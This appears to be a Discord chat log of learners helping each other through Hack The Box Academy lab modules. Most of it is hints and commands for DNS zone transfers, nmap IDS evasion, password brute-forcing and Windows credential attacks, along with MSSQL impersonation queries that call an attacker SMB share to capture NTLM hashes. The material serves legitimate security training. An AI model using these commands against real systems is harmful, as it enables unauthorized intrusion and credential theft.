#modules

1 messages Β· Page 49 of 1

feral stump
#

Tried w dig?

#

Nmap can also get the answer

atomic belfry
#

" Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer. "

Struggling here,, here is the command im running, and I am getting 40

urban anvil
#

Thank you

chilly forge
#

Hello, I'm working on the Active Subdomain Enumeration module -> Active Subdomain Enumeration. I edited the /etc/resolv.conf to have "nameserver <Target_IP>" and /etc/hosts to have "<Target_IP> ns.inlanefreight.htb". However when doing the nslookup I do not get a second DNS zone? I only see 1 NS and for the life of me I cannot find a second DNS zone. Is there something wrong with these two configs (resolv/hosts) or am I just blind? Could you please give me a hint?

zenith iris
#

This task requires performing several steps:

Install curl on your Pwnbox if it is not already installed.

Open the terminal and run the following command to retrieve the source code of the website:

javascript

curl https://www.inlanefreight.com/ > source_code.txt

Use grep or another text manipulation tool to filter the unique paths of the domain. For example, using grep:

bash

grep -o 'http[s]://[^"]' source_code.txt | sort | uniq > unique_paths.txt

To count the number of unique paths, you can use the wc (word count) command:

bash

wc -l unique_paths.txt

The output of this command will be the number of unique paths.

urban anvil
#

Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain. This is the question

chilly forge
#

i did that one! I got the FQDN

#

Its the zones that are bugging me

#

Identify how many zones exist on the target nameserver

urban anvil
#

I did the remaining but i m not getting the first one

chilly forge
#

Oh then we can help each other i think?

#

Let's see

urban anvil
chilly forge
#

The second one (Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer.) and the third one (Find and submit the contents of the TXT record as the answer.). I can't seem to find the second zone?

cunning drum
#

i was in attacking comman services hard lab i used execute () function its not giving me any results so used EXEC command to open flag.txt in administrator desktop can any one figure out what's the problem

urban anvil
#

dig axfr <subdomain>.inlanefreight.htb @rustic sageAddress

cunning drum
chilly forge
#

but which subdomain do you enter there then?

urban anvil
#

u ll get a flag

chilly forge
#

Is that trial and error or did you know?

#

I mean you can go past all subdomains, but is that best practice?

#

AH I think I get it now

chilly forge
# chilly forge -

If you don't mind, I'd like to edit this one so I don't spoil for others, mind if I edit it?

urban anvil
#

yeah no worries

#

i am still not getting the first one

chilly forge
#

Wanna take it to DMs?

urban anvil
#

yeah

fathom pendant
winged zodiac
#

Hey I need some help in Footprinting module got stuck in DNS section couldn't find the answer of "Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain. "

fathom pendant
#

Dig?

winged zodiac
#

I got some output through dig but none o them were right answer

fathom pendant
#

Because that will tell you the nameserver(s)

#

It's probably more obvious than you're thinking it is

winged zodiac
#

Oh let me check once

#

Thanks man It worked I just over complicated stuff as usual

fathom pendant
#

Mhm if it's starting to look overly complicated always look back over your results

carmine lark
#

Attacking Web Applications with Ffuf
problem I'm facing is host is not resolving from my /etc/hosts file.
It works with any standard IP however as soon as i add the target IP to my /etc/hosts no one wants to resolve it.
I've tried multiple solutions however non of them works.
<standard IP> <name> works

#

<target IP> <academy.htb> doesn't

#

as a kicker as well I can't ping the target IP, I can grab a cURL from the raw IP however as soon as I assign it a DNS name in my /etc/hosts file then CURL doesnt want any of that

fathom pendant
#

Then don't assign it a DNS name

#

If it works just raw why change it?

#

Are you meant to use a specific name?

carmine lark
#

because I need to access a subdomain on the same IP.
It's a module about VHOSTS and i require to access many names on one IP

fathom pendant
#

Are you doing just the IP and not the port

carmine lark
#

I'am using the port as well tho

tawdry canopy
#

it almost sounds like the hostname is wrong and the webserver is rejecting it

fathom pendant
#

^

#

Also you don't need port number in /etc/hosts

carmine lark
#

@fathom pendant hmmmmm..... interesting

#

let me test that out.

fathom pendant
#

You specified the source port far after the --source-port

#

Try --source-port 53 then the rest

#

also rnd is not needed

#

Also did you just... Visit the IP?

#

:)

#

Also

#

-S

#

You don't need that

#

-S is telling nmap you want to spoof using the provided IP

#

That word is blocked: but yeah that is also it

#

You get access to the page/status.php iirc

#

Oh wait not the same thing

#

One sec

dim wolf
#

i wonder why crackmapexec couldn't crack the password but metasploit could..

fathom pendant
#

Yeah no you get access to that page

#

I just looked at my notes for that one

#

I did this without nmap that's why lol

uncut meadow
#

yo team... can somebody give me a hint on Attacking Common Services - Hard module please?

fathom pendant
#

Maybe if you gave more context to your question

uncut meadow
#

I have access to mssql and rdp of course but not able to continue as I didnt find a way to bruteforce passwords of found users or impersonate them... I also find a linked server but cannot check it

#

at the end I answer every question but last

vital adder
uncut meadow
vital adder
#

yep and i did try with impacket-mssqlclient both of them work fine for me

thick cave
#

Hi

uncut meadow
#

ok I will try again, I found 2 users and when I try to impersonate one of them dont work and I get an error message with the other user as user don't exists.. very strange. thx for the hint

thick cave
#

Hi

vital adder
uncut meadow
#

thx

thick cave
#

Hi I'm new user please help me

vital adder
#

with what?

fathom pendant
thick cave
#

Ar u Hacker

fathom pendant
#

Ah

#

One of these kids

vital adder
#

this again

thick cave
#

Hey

#

I'm confused

fathom pendant
thick cave
#

Ho

vital adder
fathom pendant
#

What's up kiddo just ask the question you're here for

rustic sage
#

hello all, can someone please point me to the right direction for getting the dns version in the medim lab for nmap? I am stuck with this command: sudo nmap -p 53 -sV 10.129.98.3 -sC -Pn -sU --source-port 53 and this result: 53/udp open domain NLnet Labs NSD

thick cave
fathom pendant
thick cave
#

Sorry

vital adder
thick cave
#

Good night

I'm Bangladesh

fathom pendant
#

Ok bye

fathom pendant
#

Refreshing your VPN connection can also get it to work (disconnect/reconnect)

thorny wadi
#

can someone give me a nudge on Password Attacks Lab - Easy ?

acoustic owl
dim wolf
fathom pendant
#

I just reran it with one of the things I used and I got the flag in 3 things with nmap :D

thorny wadi
dim wolf
#

yeah i was thinking "my nmap command should be working" and i opened up wireshark to verify my claim

acoustic owl
thorny wadi
#

sent

patent obsidian
#

almost.....

fathom pendant
#

Gl

acoustic owl
odd dawn
#

Hey guys!
Could anyone recommend me any modules that can help me in studying reverse engineering? As far as I've looked I don't think I've seen any that touch that stuff in the academy, but maybe I'm missing something?
If there are none in the academy can anyone recommend a good source to study from? Also, I want that source to dive as deep as possible so I can master my knowledge before going in and solving stuff from the HTB challenges.
Thanks in advance! 😊

compact apex
#

I good starting point maybe asm learning ? πŸ™‚

#

buffer overflow also

#

It is not reverse engineering but it can help to understand how a program works

thorn urchin
#

I dont think theres really any geared for RE yet

dim wolf
#

the only module i can think of is Intro to Assembly Language

#

because the prerequisite for learning reverse engineering is knowing assembly

odd dawn
vital adder
#

i'm not sure but you may need to verify to access that channel

solar zodiac
#

hi everyone πŸ™‚

#

has anyone done the blindsqlmodule? im trying to code a tool based on the module, but when I try to do a certain query and print it it errors out

fathom pendant
solar zodiac
#

its strange because the query to print out the flag works

#

but not the query to print a password

#

was wondering if anyone could advise πŸ™‚

livid zephyr
fathom pendant
#

I just redid the module ran the same command I used previously and it worked just fine

livid zephyr
fathom pendant
#

I got the flag in 3 ways looking at my command

fathom pendant
livid zephyr
fathom pendant
livid zephyr
fathom pendant
#

you need to suppress ICMP ping iirc

#

also disabled arp ping in my request

livid zephyr
#

I ran this but didn't work

fathom pendant
#

try using the right source port

#

also -sC isn't necessary

#

also do a packet trace

#

just to see what's going on

#

:)

livid zephyr
#

shouldn't the source-port be 80? the hint says to look at that port.

fathom pendant
#

should be source-port 53 as that entire module talks about

#

port 53 is dns port which defaults is trust as anything coming from that port is just trying to get transferred to/from another internal domain

#

note: i just ran it twice - modifying my command slightly

#

don't need to specify source port

#

I'm basically just shortening what I have until it works

#

this is also the one where they give you access to the http://<IP>/status.php

urban pier
#

Hi everyone, i've a problem "skills assesments : Login brut force" Which file should we use ? ty

fathom pendant
fathom pendant
#

as I adjusted my code multiple ways and variations

#

and even did --source-port 80

#

and was able to retrieve the flag

livid zephyr
#

it didn't work.

fathom pendant
#

it's getting a read timeout

livid zephyr
#

don't know why.?, I'll try restarting the machine.

fathom pendant
#

yeah refresh your vpn connection first

#

disconnect/reconnect

livid zephyr
#

ok

fathom pendant
#

or swap servers and connect to the new vpn connection

static roost
#

Struggling on Case #11 in 'Bypassing Web Application Protections' of Sqlmap Essentials module. The hint isn't helping. Can anyone assist this pleb?

livid zephyr
#

shit!!, I got it. I ran the same command after changing the VPN server and re-downloaded the VPN file.

#

somehow that works, so it seems it was the server i was using.

fathom pendant
#

potentially

livid zephyr
#

I am blaming it on Gremlins

fathom pendant
#

anyway GL with the hard!

livid zephyr
#

I already did the hard one yesterday when I was tryiing to figure out this one, and got that one fast.

fathom pendant
#

yeah

#

sometimes the "hard" labs seem easier

#

but it's usually because the "medium" labs already prepped us mentally for what to look for

livid zephyr
#

that is for sure.

atomic ruin
#

Currently on Password Attacks - Credential Hunting in Linux. I already got the users password, but only with the hint to help me get a first foothold. Can I get any help on what's the intended way of getting the first foothold? Think I have it, but godamn would this take forever this way

dire sentinel
#

thank you

median fog
#

I used the hint, but then I tried to recreate the steps as if I didn't have it. You can guess the username from an Nmap scan, and the password is in the rockyou list; it took me 20 minutes to do a brute-force scan with hydra.

urban pier
#

An persons can help me about Skills Assessment - Website ... I use good parameter with Hydra etc. But i cant to find the wordlist ... (Password). Ty

silver sigil
#

I was stuck on "Enumerate hostname" for nmap. I had to read more into the documentation. I think I got my answer. It just goes to show that sometimes you need to punch in a line of code and then grab a coffee while you are at it

analog tendon
#

im working on the IPMI footprinting and when using hashcat i get this error. "Initializing backend runtime for device #1...Illegal instruction" has anyone run into this? online forums seem to be unhelpful

cunning drum
#

i need help in common services hard lab

#

did any one completed

vital adder
supple jackal
#

hey yall im on linux fun and i am doing the Service and Process Management i am trying to answer the question on what the unit name is of a service with "Load AppArmor profile etc... i have used the cmd systemctl list-units and have found that service and the unit name with it but when i put it into the answer i get it wrong

vital adder
kindred prism
#

Can anyone please help me with 'Cracking passwords with hashcat' - Cracking Common Hashes section? I am getting MD2 for the hash but no MD2 mode for hashcat and I have tried only cracking for MD2 with no success. MD5 isn't working either and the hint of rule or hybrid mode isn't working either considering I am not sure of the mask.

vital adder
vital adder
silver sigil
cunning drum
vital adder
cinder mortar
#

Im stuck on Module Getting started, the privilege escalation part. I have already identified which exploit to use however i ran into this issue, /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found, anyone knows what i have to do to get this fixed? like do i need to compile the exploit on an older glibc version on my attadck machine before transferring the exploit to the target machine?

vital adder
#

also no idea if that will work

kindred prism
vital adder
#

yeah that's the first 3 and none of it is right

vital adder
cunning drum
#

@vital adder New problem

#

You do not have permission to use the bulk load statement.

#

i impersonated user john

supple jackal
#

so when i grep the description would it look like this... systemctl list-units | grep "Load AppArmor profile managed internally by snapd"

vital adder
vital adder
supple jackal
#

so that is the unit name correct

#

--type=service was that what was missing

#

i put that in already

#

i found it a different way lol way harder had to look through all the services lol

#

but when i put that unit name in it says im wrong

vital adder
#

yeah you may want to remove this because that's the right answer give the page a refresh or even a hard refresh and try again

analog tendon
supple jackal
#

remove the pic

vital adder
#

sometime it's work just fine with both hashcat and john but sometime it just don't for no reason and i just give it a try and it doesn't seem to work for me right now (on the pwnbox)

analog tendon
vital adder
#

that could be the issue

urban pier
vital adder
#

are you on the first or second question?

urban pier
#

first

#

"When you try to access the IP shown above, you will not have authorization to access it. Brute force the authentication and retrieve the flag."

vital adder
#

and you don't need to find a ||username|| for this

urban pier
#

So what username am I going to use ? :/ ..

vital adder
#

hint you don't and there only 4 main section for this module so go back and check each one them for this

pure sapphire
#

Hi

rustic sage
#

Hi

pure sapphire
#

umm

thick cave
#

Good morning

cinder mortar
#

Im stuck on Module Getting started, the privilege escalation part. I have already identified which exploit to use however i ran into this issue, /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found, anyone knows what i have to do to get this fixed? like do i need to compile the exploit on an older glibc version on my attadck machine before transferring the exploit to the target machine?

cunning void
#

can u help me out with the module called vulnerability assesment

#

how am i supposed to scan for the nessus activity

#

is there anyone online at the moment

#

......

#

.....

#

..

#

....

vital adder
cinder mortar
#

can i pm u with what i found to avoid spoilers here?

vital adder
#

@cunning void spamming isn't going to help rather just say what issue your are having (delete this the first time on accident)

raven cairn
#

I'm confused because I am following the module exactly.

#

The command just kinda stops immediately

raven cairn
#

I needs help : (

cunning void
#

i am just confused on how to do the activity they provided for nessus in the vulnerability assesment module

#

i thought they have nessus preinstalled in their server so i ssh-ed into it and i tried running the {systemctl start nessusd.service}

#

but it was not working

raven cairn
#

What section? should be straightforward

vital adder
# raven cairn I needs help : (

the version show in the example is 5.0.2dev and the version on the pwnbox is 5.4.1 (i think it's the latest) and it's seem to be working on my kali which is running version 5.2.2

raven cairn
#

So use a different version??? Like I'm really frustrated because the attacking common services module wasn't working, so i switched to the password attacks module lol

cunning void
vital adder
#

the latest crackmapexec have some dumb update one of them is when you dump the ntds in the dumped file they add some dumb account status stuff so if you want to use that to continue other stuff you have to filter the stupid status thing out which isn't that bat but it's annoying

raven cairn
#

So how should I go about using an older version?

vital adder
vital adder
raven cairn
#

I don't want to set up a vm πŸ™„

#

like just make the damn modules work htb

vital adder
shadow canopy
#

Are these sections from password attacks (dumping Sam,lsasa,ntds,pass the hash, pass the ticket) are they exploitation or post exploitation or lateral movement phase

raven cairn
#

I haven't been able to make any CPTS progress recently cuz the modules have been buggy 😭

vital adder
#

@raven cairn oh wait i'm dumb you can just install an old version of cme by overwrite the current one with:
sudo pip3 install 'crackmapexec>=5.2.2,<5.4.1' --force-reinstall

placid quest
#

@shadow canopy lateral movement

raven cairn
vital adder
#

np also i can't remove my christmas hat because i can't find the original image without the hat 🀣 (i'm 100% sure it's still in my laptop some where)

shadow canopy
fathom pendant
raven cairn
#

I've also been resetting the box to make sure that things are working

vital adder
#

yeah the dumb update in the new version is the only issue i can think of

#

also give me a sec i'll reset both my pwnbox and target and re-try every to see if it's still work

raven cairn
#

No problemo. I really appreciate the help : )

vital adder
#

@raven cairn i just give it a try with basically the same thing with the install command and it's also working fine for me and i did have doubt about the command i send because when i was trying to install old crackmapexec i did run a bunch of command and didn't check which work i just send the last command i ran

#

and yep it's was the right command that install an old version of crackmapexec and that old version seem to be working fine for me

raven cairn
#

Ok now it works that I have created new pwnbox instance.

#

weird lol

fathom pendant
#

It do be like that

vital adder
#

yea my guess is you may broke something when trying do debug cme (if you did) but the pip install thing should overwrite the old one and install everything needed so that shouldn't be an issue

#

but like i said before the pwnbox (kinda) suck ass

raven cairn
#

Also is there a reason I am getting SMB errors?

fathom pendant
raven cairn
fathom pendant
#

Honestly idk

thorn urchin
#

Documentation and Reporting module taking me so long lol Feel like my notes are like a novella compared to my more technical section notes. Hurts too that its boring but super critical info.

raven cairn
# raven cairn

Like, I haven't ever seen this when I am using Smbclient but at this point I am not sure if I don't know what I am doing, or this section is broken.

thorn urchin
#

Like dont get me wrong, its an absolutely amazing module and Im hella grateful its there. Its just also the complete antithesis of everything I find interesting and it musters all of my willpower to properly learn it.

brisk geode
#

whoever made the pivoting module i love him/her

modest isle
#

I did, maybe so☺️

brisk geode
modest isle
#

😹😹

#

Is it that difficult?

brisk geode
modest isle
#

Wtf! How was I supposed to know you're male?!

brisk geode
modest isle
#

There are females here too, jsyk

fathom pendant
#

They are just males in disguise: no such thing as females on the internet

modest isle
#

Gosh! Sucha heartless MarcieLee

modest isle
#

So, if a lady becomes a hacker, she unknowingly becomes a man, really?

fathom pendant
#

It's a running internet joke

#

Since way back when

#

Due to the presence of catfishing and stuff

brisk geode
fathom pendant
#

Cope

brisk geode
fathom pendant
#

Yes

brisk geode
#

would u mind if i dm u?

fathom pendant
#

Yes, I mind. :) Don't

brisk geode
#

alr then LMAO

modest isle
#

Lol

#

Someone tell me about cpts

brisk geode
fathom pendant
brisk geode
#

marcie do you have oscp?

fathom pendant
#

Nope

modest isle
#

Is the CPTS a very valid certification as a Pentester

fathom pendant
#

It's not widely industry recognized ATM; it's valid, but OSCP is still the HR dropper

proud pine
#

I've seen quite a few pentest positions that say 'OSCP or equivalent', so while CPTS might not hit recruiter keywords yet, I'd expect that it'd probably be respected at any place you end up getting an interview.

fathom pendant
#

I'd say CPTS surpasses OSCP from what people have said

modest isle
thorn urchin
#

More modern content that goes far more in depth in exploitation as well as having a much greater emphasis on methodology. It also has one of the best beginner into intermediate AD modules of any course. It more appropriately prepares you for the actual real life job of being a junior pentester.

#

Or at least thats been the general consensus so far

#

My review of the new @HackTheBox Certified Penetration Testing Specialist (CPTS) certification - Hope you enjoy πŸ™‚ #HackTheBox #HTB #CTF #Pentesting #OffSec #CPTS #Certification #Course

β†’Social Media↣
Twitter: https://twitter.com/_CryptoCat
GitHub: https://github.com/Crypto-Cat
HackTheBox: https://app.hackthebox.eu/profile/11897
LinkedIn: https:...

β–Ά Play video
modest isle
#

So how much can we rate HTB with respect to its certifications?

fathom pendant
#

Considering the main site has some contracts with companies and is certified as a CE service

thorn urchin
#

So far people really like CPTS over its competition for its target skill levels, but its still too new for industry recognition

#

OSCP will help you land interviews, CPTS will help you pass interviews

modest isle
#

Interesting perspective

#

But they don't cost the same

fathom pendant
#

No, by far CPTS is cheaper. But price is not the same as quality

thorny wadi
#

can someone give me a nudge on Password Attacks Lab - Hard ?

versed frost
#

can someone give me a hint on where to find the SAM database? I tried many answers that I know and non of them is correct

placid quest
#

Look in system

thorny wadi
odd dawn
brisk geode
#

Can anyone give me a nudge on Attacking Common Services - Hard

i got john's pass but i dont know how to get the admin priv.

placid quest
#

@brisk geode maybe i may help u

versed frost
brisk geode
placid quest
#

@brisk geode yes

pliant sage
odd dawn
#

@livid zephyr @fathom pendant actually this is one that I think I found already, but also great info!
There's a course in tryhackme, that focuses on malware analysis, so I'll take it.
Thank you 😊

versed frost
pliant sage
sly nebula
#

The "Blind SQL Injections" module was very fun.

acoustic owl
pseudo wharf
#

Hello guys! can i DM someone to get help with the Pivoting module? thanks πŸ™‚

dense ferry
rain garnet
#

Hi HTB dudes.
Hope you guys have a happy day!

I have questions regarding the markup box.
Why I couldn't get the ssh key of the Daniel machine after I ran the payload.
I got 200 ok responses from http request through burp suite.
Does anyone have a solution on this please share.
Big thanks πŸ™

acoustic owl
acoustic owl
rain garnet
#

Thanks for your reply. Yes I followed the scripts there. However I still have the same issues.

#

Any idea maybe this is the cause of the burp suite community edition?
Of the htb machine itself. Or the remote machine ?

acoustic owl
#

Maybe someone in channel #boxes can help you

rain garnet
#

Planning to use vm just to see if my VM machine has the same result.

turbid lily
#

Finishing "Active Directory Enumeration & Attacks" feels so good. It was endless D:

storm jackal
turbid lily
pliant sage
#

yeah took me abt 10 days too

cinder mortar
#

need help on enumeration with nmap module, service enumeration section.
I've enumrated and found all the services but idk how to proceed further

#

i've found the flag from one of the services but that is meant for a later part

covert trellis
#

I need with the getting started "privilege escalation second question I get to the ssh key and don't know what to then onwards

cinder mortar
#

service enumeration section

#

"Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer."

#

this is the question

feral stump
#

Try nc to the port you are interested in

#

You could also try with banner script of nmap

cinder mortar
graceful rampart
pliant sage
#

i spent way more than 16 hours on that module

#

granted I'm not super good at this but still

shadow canopy
#

Password Attacks
Pass the Ticket (PtT) from Windows

Optional: Try to use both tools, Mimikatz and Rubeus, to perform the attacks without relying on each other. Mark DONE when finish.

i am able to do everything with mimikatz. however, i'm trying to use Rubeus. (Rubeus.exe dump /nowrap) the base64 output doesn't decode with cyberchef and online decoders
anyone know how to decode the strings

turbid lily
# graceful rampart The times listed for each module assume you are spending 8 hours a day studying.

Even with 8 hours a day and assuming you are being formed through the Path it's impossible in 2 days if you really want to understand and test everything in that module. If you are a experienced pentester and you try that ok, "2 days". But for someone who's new there's no way to do that in 2 days. Also, 'not' being 2 days is not even a thing. I'm just saying that the webpage says 2 days but it's way longer than that

graceful rampart
graceful rampart
#

It won't look like it decoded properly no matter what you do

shadow canopy
#

so (Rubeus.exe dump /nowrap) is to just extract info users,domain,etc

#

but how can i use the base64-string to pass the tick with Rubeus.exe

cinder mortar
#

Can i get a nudge on network enumeration with nmap, firewall and ips/ids evasion medium lab?

gilded hazel
#

Hi

brisk geode
#

Pivoting, Tunneling, and Port Forwarding>> ICMP Tunneling with SOCKS

any solution?

iron basin
#

Anyone wish to nudge me in the right direction on Attacking Common Services - Easy lab?

waxen barn
#

How did you find the ilf_admin page?

shut dragon
calm abyss
#

hello, can somebody tell me what is the IP address of academy.htb ?

median fog
acoustic owl
brisk geode
acoustic owl
calm abyss
#

hello, can somebody tell me what is the IP address of academy.htb ?
Can you look from /etc/hosts

I am stuck.

acoustic owl
acoustic owl
calm abyss
chilly forge
#

Can anyone tell me why running EternalRomance at the target host returns 'Exploit completed, but no session was created.'. The info only set RHOSTS, which I did as well. Why does the module have a remote session and I don't? I tried both exploits (the code and command version)

chilly forge
#

I don't have that option (I checked options)

shut dragon
chilly forge
#

It's not under 'Basic Options'

#

i have: DBGTrace, Leakattempts, namedpipe, named_pipes, rhosts, rport, service (3 of em), share, smbdomain, smbpass, smbuser

#

Do i set LHOST in the options after 'use 0' for instance?

rustic sage
#

Where is #giveaway ?

echo roost
chilly forge
echo roost
#

I can't enumerate anything on the port. Also there were not plugins install when I use wpscan

acoustic owl
echo roost
acoustic owl
rustic sage
#

Alright thanks

acoustic owl
echo roost
#

I did that is the 5th ip:port

#

restarted vpn

#

rebooting my kali vm.

acoustic owl
cinder mortar
echo roost
cinder mortar
#

search for public exploits with these infomation

wide hedge
#

hi guys

#

i am new here

wraith spoke
#

goodevening, during a box I encountered a vhd file encrypted with bitlocker, I cracked it but the question is how can mount such a file. I tried to follow a guide using guestmount but that brought me no mount.

echo roost
#

I was just having issues with the server. Would not work, thought there might be an outage

acoustic owl
# wraith spoke goodevening, during a box I encountered a vhd file encrypted with bitlocker, I c...
It's FOSS

Here’s the scenario. My system came with Windows 10 Pro and that came with BitLocker encryption. I installed Ubuntu in the dual boot mode even with the BitLocker encryption enabled for Windows.

You can easily access the Windows files from within Linux. No hi-fi stuff here. Just go to

tight basin
#

Hi, could anyone give me a hint for the module "Attacking Common Services - Hard". I've gained access to ||fiona and have mssql, but when I try to execute hash stealing as john (impersonating) I'm getting stuck, I've tried responder and impacket's smb server ||

||[] Incoming connection (10.129.203.10,49703)
[
] AUTHENTICATE_MESSAGE (,WIN-HARD)
[] User WIN-HARD\ authenticated successfully
[
] :::00::aaaaaaaaaaaaaaaa
[] Closing down connection (10.129.203.10,49703)
[
] Remaining connections []||

This is the query:
||EXECUTE AS LOGIN = 'john' EXEC master..xp_subdirs '\10.10.15.95\share'||
||EXECUTE AS LOGIN = 'john' EXEC master..xp_dirtree '\10.10.15.95\share'||

echo roost
#

@acoustic owl @cinder mortar thank you

acoustic owl
dim wolf
#

i didnt read

tight basin
thorn urchin
#

sounds like youre not using appropriate creda

tight basin
#

Oh I used the wrong connection for the ||linked server||
did this
||EXECUTE AS LOGIN = 'john' EXECUTE('EXEC master..xp_subdirs ''\10.10.15.95\share''') AT [WINSRV02/SQLEXPRESS]||

instead of
||EXECUTE AS LOGIN = 'john' EXECUTE('EXEC master..xp_subdirs ''\10.10.15.95\share''') AT [LOCAL.TEST.LINKED.SRV]||

But still struggling with|| no hashes on the responder||

tidal kelp
#

Module Pivoting, Tunneling,and Port Forwarding'Skills Assessment. I need help on question 5, i have the creds for user vfrank but when I connect to 172.16.6.35 i get nothing. can someone help me out? thanks

storm jackal
tidal kelp
storm jackal
#

yeah

acoustic owl
terse pike
#

So I'm trying to do the linux fundamentals. I'm connected to the VPN and can ping the target machine, but when I try to SSH to it nothing happens until it tells me my connection timed out.

timber hatch
#

using web proxies, Intercepting Responses
where can i change the type. in burp itself or with the help of the devloper tools? i tried both but did'nt find out yet...

gritty peak
#

Ey! I am a bit stuck: In the Footprinting module under DNS we are suppose to:interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.

I have tried every type of DNS lookup with DIG from an A record to a SOA. I assumed I would find the FQDN in an A record, but there is nothing that looks like a FQDN, any advice?

gritty peak
timber hatch
#

i should change the type from number to text...but i cant write override it in burp and neither with the devloper tools

gritty peak
#

you want to modify a request?

#

If you want to modify a request, in burp do the following:
right click on the request you want to modify and click "send to repeater"
Go to the "repeater tab", here you are able to modify the request and send it by clicking "send"

#

You can't efficently do it with dev tools, but you can download insomnia, right click the request in dev tools > networking and click "copy as CURL" then paste it into insomnia

timber hatch
#

yes normaly when i work with burp i do exactly as you sad. send it to the repeater and than modify the request and send it again

timber hatch
#

but here i would have to modify the response...u know what i mean

gritty peak
#

You can only modify requests and send those

gritty peak
#

Open dev tools and go to "inspector", now double click on the field you want to change, it should highlight and you should be able to write whatever you want

carmine quail
#

looks like a potential injection to me. Try inserting values on the page, but before you click the submit button on the web page, make sure your burp is set to intercept the requests. Then when you capture it, you can modify it.

timber hatch
gritty peak
acoustic owl
rustic sage
#

Hi, I have just started hackthebox I am at the starting point, and when I launch my machine on the kali terminal, it is not the same IP as the one on the HTB machine. If anyone can help me please

gritty peak
fathom pendant
tight basin
rustic sage
tight basin
static roost
#

Struggling really hard with SQLMap Essentials - Bypassing Web Application Protections: Case#11. Can I pm someone or someone pm me for help? Tried so many different flags and variations with '--tamper=', but nothing is returning.

wraith spoke
#

pff that pasword - Hard is really hard. Found a SAM and System, dumped the hashes and cannot manage to login with pass the hash. really slamming my head into the desk now.

#

tomorrow i will try if invoke the hash works...

atomic ruin
#

been finding the entire password module a thing of extremes. it's either super obvious and just follow along with the content, or "here's a brick wall. try to break it with your face"

verbal galleon
#

ahw man losing much time on that hard machine

rustic sage
#

yes I understood and it works well thx

soft jolt
#

Hello everyone, someone was able to crack the root hash on
Password Attacks - Passwd, Shadow & Opasswd Module?

fathom pendant
#

Probably

shut dragon
#

Anyone have trouble with the answer syntax on Footprinting - Host Based Enumeration - SMB exercise questions 1 and 6?
1.) What version of the SMB server is running on the target system? Submit the entire banner as the answer.
6.) What is the full system path of that specific share?

I'm confident that I've found the information required for the questions, but I can't seem to format it correctly for submission.

#

Got 6.. had an extra / at the end lol

#

Still stuck on 1 tho?

#

I got it πŸ™ƒ lol TIL... when service scanning for SMB, do ports 135,139,445 not just 139,445

raven cairn
#

Is this error with smbclient normal? (password attacks module - Network section)

shut dragon
#

I think ls is the wrong command.. try dir

raven cairn
#

Dir gives me the same error

#

Recent pwnbox updates might have screwed some stuff up but I am not sure

shut dragon
#

That's odd ya one of those two should work

raven cairn
#

I don't really have a virtual machine and it's hard for me to set one up cuz I am at the university all day and I don't think I can set up kali on those computers

shut dragon
#

I was having some issues with pwnbox earlier today too. I was luckily able to utilize a VM though

rotund nacelle
#

Hi!

raven cairn
rotund nacelle
hard dew
#

I'm having trouble with the footprinting DNS module, I've tried most of the word lists now but both the target and the pwn box expire before the enumeration completes, I'm starting to get frustrated

raven cairn
#

If you need help with any modules lmk

rotund nacelle
vital adder
raven cairn
vital adder
#

oh yeah i forgot this section is a bit messy and kinda buggy let me do some test or find my old note on this stuff and i'll get back to you but some user may have some thing that you just can't access because it's all on the same box

hard dew
#

Could someone point me in the right direction with DNS footprinting please

vital adder
boreal vine
#

Someone for "Active Directory Enumeration & Attacks" part "Privileged Access" ? have a question

vital adder
#

sure what's the question?

hard dew
vital adder
#

@raven cairn ok yep i just give it a quick try and it seem like ||all valid user|| have the same share but only the "right" user have access to it (the user for the smb question) and this is kinda dumb but if you want to find it with cme just use the --continue-on-success and don't use the given username list for this

hard dew
#

I swear I can read πŸ€¦β€β™‚οΈ

void gate
#

Module: Password Attacks
Section: Password Attacks Lab - Hard
Issue: I've found the || .vhd || file and tried smbmap to 'get' however the transfer is taking a significant amount of time i.e. - I ran the transfer overnight and it was only half done when I checked. Are there efficient alternative methods to download the file to || mount, enumerate and crack offline ||

fresh reef
#

How can I establish a foothold onto Attacking Common Services - HARD ? Ive been testing against rdp & the mssql services mainly utilizing my least favorite method "Brute forcing"...using the resources give & rockyou...yet no luck. Any Guidance?

vital adder
#

nope you still need a username wordlist (not the given one) so hint you have to ||make your own||

vital adder
vital adder
#

oh wait a sec why tf are you using smbmap?

#

no idea if you can download file with that tool or smbclient will download it faster but just use smbclient

void gate
#

smbclient threw an error, tried a couple of times. looked around for help and someone suggested smbmap, it at least progressed past the error. I'll try smbclient in my VM again and if not I'll explore using the pwnbox

fresh reef
vital adder
# raven cairn Like this?

also if you don't want to brute force (with 2 wordlist), since you should have access to the target machine you can just compare the ||share name|| with ||some user||

vital adder
vital adder
void gate
#

Makes total sense, smbclient timeout again so I'll fire up the pwnbox and give it a go

unkempt drift
#

Hi, kinda stupid question but I was reading the Using Web Proxies module, in particular the Proxying Tools section and I can't get nmap to work with burp, I've tried both with --proxies http://127.0.0.1:8080 and with proxychains but no requests shows up on burp. proxychains works both with curl and metasploit

fresh reef
raven cairn
vital adder
#

but wireshark is a much much better thing to use if you want to log nmap traffic then burp

raven cairn
#

Now on to the password mutations section πŸ’€

#

This section needs to be updated so badly : (

unkempt drift
#

I guess it's because they work on different layers

fresh reef
twilit schooner
#

I cant post in help area

#

I am having trouble connecting to starting point vpn, Ive been trying for 2 days to connect and i get the same error everytime,

#

" $Option error: In [CMD-LINE]:1: Error opening configuration file: " thats the error in my terminal when I try to connect

vital adder
twilit schooner
#

how do I verify?

#

I dont see a starting point channel in my list

thorn urchin
#

youll see starting point after you verify

twilit schooner
#

ok thanks

stuck path
#

buenas

opaque marlin
#

buenas

rustic sage
#

Just don’t hear about this typically I never did until the module

rustic sage
pseudo epoch
#

Quick question, I'm having trouble with the RDP section of the Password attacks module, whenever I run hydra against the target for RDP with the provided resources, the scan takes longer than the box time limit. I know theres a restore file, however the IP always changes when you restart the box. Is this a connection issue, or am I missing something? fyi, this happens in both my host and the provided attack machine

fathom pendant
#

bless previous people going through the password mutations i was able to brute the ssh super quick with it

rustic sage
#

